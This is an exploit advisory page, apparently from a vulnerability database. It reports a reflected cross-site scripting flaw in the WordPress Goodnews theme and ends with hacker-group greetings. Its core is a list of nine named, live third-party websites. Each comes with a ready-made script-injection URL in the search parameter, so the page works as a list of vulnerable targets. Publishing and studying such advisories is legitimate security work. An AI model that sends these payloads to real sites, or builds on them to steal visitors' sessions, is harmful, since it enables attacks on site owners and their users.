Wordpress Goodnews Themes Reflected Cross Site Scripting

2016.02.28
Credit: Milad Hacking
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title: Wordpress Goodnews Themes Reflected Cross Site Scripting [+] [+] Exploit Author: FullSecurity.org [+] [+] Discovered By: Milad Hacking [+] [+] Vendor Homepage : http://www.momizat.net/ [+] [+] Date: 2016-02-28 [+] [+] Tested on: Kali Linux / lceweasel [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Demo : http://albertsoler.com/?s=<script>alert('1')</script> http://www.altoriodoce.com/?s=<script>alert('1')</script> http://www.araamesh.com/fa/?s=<script>alert('1')</script> http://www.tele3.ro/?s=<script>alert('1')</script> http://bhportal.com.br/filmes/?s=<script>alert('1')</script> http://holdupnow.com/?s=<script>alert('1')</script> http://tricountysentry.com/blog/?s=<script>alert('1')</script> http://www.reklamdergisi.com/?s=<script>alert('1')</script> http://www.animder.com/?s=?s=<script>alert('1')</script> Ya FaTeme Zahra [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi - irhblackhat - Distr0watch - N3TC4T - Ac!D - Mr.G}{o$t - S4livan - MRS4JJ4D - SeCrEt_HaCkEr , Nazila Blackhat , Bl4ck_MohajeM , Xodiak , Ehsan Ice Ehsan Hosseini (EhsanSec.ir) [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] Greetz to: My Lord Allah https://telegram.me/thehacking http://FullSecurity.org milad.hacking.blackhat@Gmail.com [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

References:

https://telegram.me/thehacking
http://FullSecurity.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top